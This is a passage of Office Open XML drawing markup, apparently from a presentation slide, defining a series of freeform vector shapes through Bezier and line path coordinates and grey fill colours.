                      <a:pt x="719" y="217"/>
                      <a:pt x="719" y="217"/>
                      <a:pt x="719" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="747" y="146"/>
                      <a:pt x="756" y="84"/>
                      <a:pt x="743" y="46"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="545554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90" name="Freeform 414">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65D6707C-49C5-4491-A35E-26D845839699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953" y="635"/>
                <a:ext cx="1795" cy="2391"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 719 w 760"/>
                  <a:gd name="T1" fmla="*/ 16 h 1012"/>
                  <a:gd name="T2" fmla="*/ 704 w 760"/>
                  <a:gd name="T3" fmla="*/ 10 h 1012"/>
                  <a:gd name="T4" fmla="*/ 502 w 760"/>
                  <a:gd name="T5" fmla="*/ 149 h 1012"/>
                  <a:gd name="T6" fmla="*/ 502 w 760"/>
                  <a:gd name="T7" fmla="*/ 150 h 1012"/>
                  <a:gd name="T8" fmla="*/ 178 w 760"/>
                  <a:gd name="T9" fmla="*/ 571 h 1012"/>
                  <a:gd name="T10" fmla="*/ 168 w 760"/>
                  <a:gd name="T11" fmla="*/ 585 h 1012"/>
                  <a:gd name="T12" fmla="*/ 91 w 760"/>
                  <a:gd name="T13" fmla="*/ 700 h 1012"/>
                  <a:gd name="T14" fmla="*/ 68 w 760"/>
                  <a:gd name="T15" fmla="*/ 987 h 1012"/>
                  <a:gd name="T16" fmla="*/ 144 w 760"/>
                  <a:gd name="T17" fmla="*/ 966 h 1012"/>
                  <a:gd name="T18" fmla="*/ 144 w 760"/>
                  <a:gd name="T19" fmla="*/ 1012 h 1012"/>
                  <a:gd name="T20" fmla="*/ 719 w 760"/>
                  <a:gd name="T21" fmla="*/ 262 h 1012"/>
                  <a:gd name="T22" fmla="*/ 719 w 760"/>
                  <a:gd name="T23" fmla="*/ 218 h 1012"/>
                  <a:gd name="T24" fmla="*/ 719 w 760"/>
                  <a:gd name="T25" fmla="*/ 16 h 10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60" h="1012">
                    <a:moveTo>
                      <a:pt x="719" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="715" y="13"/>
                      <a:pt x="710" y="11"/>
                      <a:pt x="704" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="654" y="0"/>
                      <a:pt x="573" y="58"/>
                      <a:pt x="502" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="502" y="150"/>
                      <a:pt x="502" y="150"/>
                      <a:pt x="502" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="575"/>
                      <a:pt x="172" y="580"/>
                      <a:pt x="168" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="619"/>
                      <a:pt x="114" y="658"/>
                      <a:pt x="91" y="700"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="846"/>
                      <a:pt x="0" y="974"/>
                      <a:pt x="68" y="987"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="991"/>
                      <a:pt x="115" y="984"/>
                      <a:pt x="144" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="1012"/>
                      <a:pt x="144" y="1012"/>
                      <a:pt x="144" y="1012"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="218"/>
                      <a:pt x="719" y="218"/>
                      <a:pt x="719" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="759" y="119"/>
                      <a:pt x="760" y="38"/>
                      <a:pt x="719" y="16"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A0A0A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91" name="Freeform 415">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{633EE8A0-BF3A-47BE-8AAE-DA59B7CE796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293" y="2792"/>
                <a:ext cx="813" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 813"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 813 w 813"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 813 w 813"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 813"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 813"/>
                  <a:gd name="T9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3" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="813" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="451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A0A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92" name="Freeform 416">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85D2D2B2-0452-4BC8-8ED7-0079C55DD090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293" y="2731"/>
                <a:ext cx="1040" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 813 w 1040"/>
                  <a:gd name="T1" fmla="*/ 278 h 278"/>
                  <a:gd name="T2" fmla="*/ 1040 w 1040"/>
                  <a:gd name="T3" fmla="*/ 217 h 278"/>
                  <a:gd name="T4" fmla="*/ 227 w 1040"/>
                  <a:gd name="T5" fmla="*/ 0 h 278"/>
                  <a:gd name="T6" fmla="*/ 0 w 1040"/>
                  <a:gd name="T7" fmla="*/ 61 h 278"/>
                  <a:gd name="T8" fmla="*/ 813 w 1040"/>
                  <a:gd name="T9" fmla="*/ 27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0" h="278">
                    <a:moveTo>
                      <a:pt x="813" y="278"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1040" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="278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93" name="Freeform 417">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3A0E280-204D-4037-A82C-86307D978FE9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520" y="2497"/>
                <a:ext cx="813" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 813"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 813 w 813"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 813 w 813"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 813"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 813"/>
                  <a:gd name="T9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3" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="813" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="451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A0A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94" name="Freeform 418">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85140700-0E0C-4C24-A83B-7A6526B9D02F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520" y="2435"/>
                <a:ext cx="1039" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 813 w 1039"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1039 w 1039"/>
                  <a:gd name="T3" fmla="*/ 218 h 279"/>
                  <a:gd name="T4" fmla="*/ 227 w 1039"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1039"/>
                  <a:gd name="T7" fmla="*/ 62 h 279"/>
                  <a:gd name="T8" fmla="*/ 813 w 1039"/>
                  <a:gd name="T9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9" h="279">
                    <a:moveTo>
                      <a:pt x="813" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1039" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="279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95" name="Freeform 419">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6030EF80-F9B2-4EF4-96B0-CF80A21ADF3B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747" y="2201"/>
                <a:ext cx="812" cy="452"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 812"/>
                  <a:gd name="T1" fmla="*/ 0 h 452"/>
                  <a:gd name="T2" fmla="*/ 812 w 812"/>
                  <a:gd name="T3" fmla="*/ 218 h 452"/>
                  <a:gd name="T4" fmla="*/ 812 w 812"/>
                  <a:gd name="T5" fmla="*/ 452 h 452"/>
                  <a:gd name="T6" fmla="*/ 0 w 812"/>
                  <a:gd name="T7" fmla="*/ 234 h 452"/>
                  <a:gd name="T8" fmla="*/ 0 w 812"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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2" h="452">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="812" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="452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A0A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96" name="Freeform 420">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7270E11F-3322-44FF-9945-A17DF08E33BF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747" y="2140"/>
                <a:ext cx="1037" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 812 w 1037"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1037 w 1037"/>
                  <a:gd name="T3" fmla="*/ 217 h 279"/>
                  <a:gd name="T4" fmla="*/ 226 w 1037"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1037"/>
                  <a:gd name="T7" fmla="*/ 61 h 279"/>
                  <a:gd name="T8" fmla="*/ 812 w 1037"/>
                  <a:gd name="T9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7" h="279">
                    <a:moveTo>
                      <a:pt x="812" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1037" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="279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97" name="Freeform 421">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35C44227-53F1-409F-920B-F2FB71818660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973" y="1906"/>
                <a:ext cx="811" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 811"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 811 w 811"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 811 w 811"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 811"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 811"/>
                  <a:gd name="T9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1" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="811" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="451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A0A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98" name="Freeform 422">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7124675-AA5F-4A84-AEE7-82B075C96863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973" y="1845"/>
                <a:ext cx="1037" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 811 w 1037"/>
                  <a:gd name="T1" fmla="*/ 278 h 278"/>
                  <a:gd name="T2" fmla="*/ 1037 w 1037"/>
                  <a:gd name="T3" fmla="*/ 217 h 278"/>
                  <a:gd name="T4" fmla="*/ 227 w 1037"/>
                  <a:gd name="T5" fmla="*/ 0 h 278"/>
                  <a:gd name="T6" fmla="*/ 0 w 1037"/>
                  <a:gd name="T7" fmla="*/ 61 h 278"/>
                  <a:gd name="T8" fmla="*/ 811 w 1037"/>
                  <a:gd name="T9" fmla="*/ 27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7" h="278">
                    <a:moveTo>
                      <a:pt x="811" y="278"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1037" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="278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99" name="Freeform 423">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD4F928E-65FF-4B04-BBE5-4EBDE27B1EA5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200" y="1611"/>
                <a:ext cx="810" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 810"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 810 w 810"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 810 w 810"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 810"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 810"/>
                  <a:gd name="T9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0" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="810" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="451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A0A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00" name="Freeform 424">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03BB2445-38B5-405A-991A-1AA366519201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200" y="1549"/>
                <a:ext cx="1037" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 810 w 1037"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1037 w 1037"/>
                  <a:gd name="T3" fmla="*/ 218 h 279"/>
                  <a:gd name="T4" fmla="*/ 225 w 1037"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1037"/>
                  <a:gd name="T7" fmla="*/ 62 h 279"/>
                  <a:gd name="T8" fmla="*/ 810 w 1037"/>
                  <a:gd name="T9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7" h="279">
                    <a:moveTo>
                      <a:pt x="810" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1037" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="279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01" name="Freeform 425">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A8904B0-8BD3-466C-8F86-E4971B57BC4D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425" y="1315"/>
                <a:ext cx="812" cy="452"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 812"/>
                  <a:gd name="T1" fmla="*/ 0 h 452"/>
                  <a:gd name="T2" fmla="*/ 812 w 812"/>
                  <a:gd name="T3" fmla="*/ 218 h 452"/>
                  <a:gd name="T4" fmla="*/ 812 w 812"/>
                  <a:gd name="T5" fmla="*/ 452 h 452"/>
                  <a:gd name="T6" fmla="*/ 0 w 812"/>
                  <a:gd name="T7" fmla="*/ 234 h 452"/>
                  <a:gd name="T8" fmla="*/ 0 w 812"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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2" h="452">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="812" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="452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A0A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02" name="Freeform 426">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AB33D46-02F6-4A85-BDCC-3AA779D49AA9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425" y="1254"/>
                <a:ext cx="1039" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 812 w 1039"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1039 w 1039"/>
                  <a:gd name="T3" fmla="*/ 220 h 279"/>
                  <a:gd name="T4" fmla="*/ 226 w 1039"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1039"/>
                  <a:gd name="T7" fmla="*/ 61 h 279"/>
                  <a:gd name="T8" fmla="*/ 812 w 1039"/>
                  <a:gd name="T9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9" h="279">
                    <a:moveTo>
                      <a:pt x="812" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1039" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="279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03" name="Freeform 427">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52A50B18-0546-4F61-82D4-DAF72AFC83DB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673" y="829"/>
                <a:ext cx="1784" cy="2414"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 743 w 755"/>
                  <a:gd name="T1" fmla="*/ 47 h 1022"/>
                  <a:gd name="T2" fmla="*/ 743 w 755"/>
                  <a:gd name="T3" fmla="*/ 47 h 1022"/>
                  <a:gd name="T4" fmla="*/ 743 w 755"/>
                  <a:gd name="T5" fmla="*/ 20 h 1022"/>
                  <a:gd name="T6" fmla="*/ 710 w 755"/>
                  <a:gd name="T7" fmla="*/ 11 h 1022"/>
                  <a:gd name="T8" fmla="*/ 704 w 755"/>
                  <a:gd name="T9" fmla="*/ 10 h 1022"/>
                  <a:gd name="T10" fmla="*/ 501 w 755"/>
                  <a:gd name="T11" fmla="*/ 149 h 1022"/>
                  <a:gd name="T12" fmla="*/ 501 w 755"/>
                  <a:gd name="T13" fmla="*/ 149 h 1022"/>
                  <a:gd name="T14" fmla="*/ 178 w 755"/>
                  <a:gd name="T15" fmla="*/ 571 h 1022"/>
                  <a:gd name="T16" fmla="*/ 168 w 755"/>
                  <a:gd name="T17" fmla="*/ 585 h 1022"/>
                  <a:gd name="T18" fmla="*/ 90 w 755"/>
                  <a:gd name="T19" fmla="*/ 700 h 1022"/>
                  <a:gd name="T20" fmla="*/ 63 w 755"/>
                  <a:gd name="T21" fmla="*/ 986 h 1022"/>
                  <a:gd name="T22" fmla="*/ 63 w 755"/>
                  <a:gd name="T23" fmla="*/ 986 h 1022"/>
                  <a:gd name="T24" fmla="*/ 104 w 755"/>
                  <a:gd name="T25" fmla="*/ 997 h 1022"/>
                  <a:gd name="T26" fmla="*/ 144 w 755"/>
                  <a:gd name="T27" fmla="*/ 966 h 1022"/>
                  <a:gd name="T28" fmla="*/ 144 w 755"/>
                  <a:gd name="T29" fmla="*/ 1011 h 1022"/>
                  <a:gd name="T30" fmla="*/ 183 w 755"/>
                  <a:gd name="T31" fmla="*/ 1022 h 1022"/>
                  <a:gd name="T32" fmla="*/ 718 w 755"/>
                  <a:gd name="T33" fmla="*/ 262 h 1022"/>
                  <a:gd name="T34" fmla="*/ 718 w 755"/>
                  <a:gd name="T35" fmla="*/ 218 h 1022"/>
                  <a:gd name="T36" fmla="*/ 743 w 755"/>
                  <a:gd name="T37" fmla="*/ 47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55" h="1022">
                    <a:moveTo>
                      <a:pt x="743" y="47"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="47"/>
                      <a:pt x="743" y="47"/>
                      <a:pt x="743" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="11"/>
                      <a:pt x="706" y="10"/>
                      <a:pt x="704" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="653" y="0"/>
                      <a:pt x="572" y="58"/>
                      <a:pt x="501" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="501" y="149"/>
                      <a:pt x="501" y="149"/>
                      <a:pt x="501" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="575"/>
                      <a:pt x="171" y="580"/>
                      <a:pt x="168" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="619"/>
                      <a:pt x="113" y="658"/>
                      <a:pt x="90" y="700"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="842"/>
                      <a:pt x="0" y="969"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="718" y="262"/>
                      <a:pt x="718" y="262"/>
                      <a:pt x="718" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="718" y="218"/>
                      <a:pt x="718" y="218"/>
                      <a:pt x="718" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="747" y="146"/>
                      <a:pt x="755" y="84"/>
                      <a:pt x="743" y="47"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="545554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04" name="Freeform 428">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF8A5531-CAF7-4377-9088-61061E218667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762" y="3000"/>
                <a:ext cx="1344" cy="364"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 439 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 364"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 123 h 364"/>
                  <a:gd name="T4" fmla="*/ 895 w 1344"/>
                  <a:gd name="T5" fmla="*/ 364 h 364"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 243 h 364"/>
                  <a:gd name="T8" fmla="*/ 439 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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364">
                    <a:moveTo>
                      <a:pt x="439" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="895" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="0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05" name="Freeform 429">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28524AB3-607F-488D-BA55-15F9408629C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763" y="855"/>
                <a:ext cx="1796" cy="2388"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 720 w 760"/>
                  <a:gd name="T1" fmla="*/ 15 h 1011"/>
                  <a:gd name="T2" fmla="*/ 705 w 760"/>
                  <a:gd name="T3" fmla="*/ 9 h 1011"/>
                  <a:gd name="T4" fmla="*/ 503 w 760"/>
                  <a:gd name="T5" fmla="*/ 149 h 1011"/>
                  <a:gd name="T6" fmla="*/ 503 w 760"/>
                  <a:gd name="T7" fmla="*/ 149 h 1011"/>
                  <a:gd name="T8" fmla="*/ 179 w 760"/>
                  <a:gd name="T9" fmla="*/ 570 h 1011"/>
                  <a:gd name="T10" fmla="*/ 169 w 760"/>
                  <a:gd name="T11" fmla="*/ 585 h 1011"/>
                  <a:gd name="T12" fmla="*/ 91 w 760"/>
                  <a:gd name="T13" fmla="*/ 699 h 1011"/>
                  <a:gd name="T14" fmla="*/ 68 w 760"/>
                  <a:gd name="T15" fmla="*/ 986 h 1011"/>
                  <a:gd name="T16" fmla="*/ 145 w 760"/>
                  <a:gd name="T17" fmla="*/ 966 h 1011"/>
                  <a:gd name="T18" fmla="*/ 145 w 760"/>
                  <a:gd name="T19" fmla="*/ 1011 h 1011"/>
                  <a:gd name="T20" fmla="*/ 720 w 760"/>
                  <a:gd name="T21" fmla="*/ 262 h 1011"/>
                  <a:gd name="T22" fmla="*/ 720 w 760"/>
                  <a:gd name="T23" fmla="*/ 217 h 1011"/>
                  <a:gd name="T24" fmla="*/ 720 w 760"/>
                  <a:gd name="T25" fmla="*/ 15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60" h="1011">
                    <a:moveTo>
                      <a:pt x="720" y="15"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="715" y="12"/>
                      <a:pt x="711" y="10"/>
                      <a:pt x="705" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="654" y="0"/>
                      <a:pt x="574" y="58"/>
                      <a:pt x="503" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="503" y="149"/>
                      <a:pt x="503" y="149"/>
                      <a:pt x="503" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="570"/>
                      <a:pt x="179" y="570"/>
                      <a:pt x="179" y="570"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="575"/>
                      <a:pt x="172" y="580"/>
                      <a:pt x="169" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
